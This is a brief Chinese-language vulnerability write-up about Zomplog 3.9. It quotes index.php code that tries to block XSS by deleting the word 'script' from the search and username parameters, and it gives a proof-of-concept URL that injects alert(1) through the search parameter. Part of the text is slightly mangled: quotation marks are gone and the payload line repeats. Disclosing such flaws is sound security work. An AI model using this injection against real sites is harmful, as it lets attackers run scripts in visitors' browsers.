Zomplog 3.9 XSS 漏洞利用 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    漏洞文件index.php

    漏洞代码:

    10: // some general xxs protection

    11: $_GET[search] = str_replace(script, , $_GET[search]);

    12: $_GET[username] = str_replace(script, , $_GET[username]);

    代码只是删除脚本文件的关键字,页面易受XSS攻击

    POC

    alert(1)>http://www.site.com/index.php?search=">alert(1)

最新文章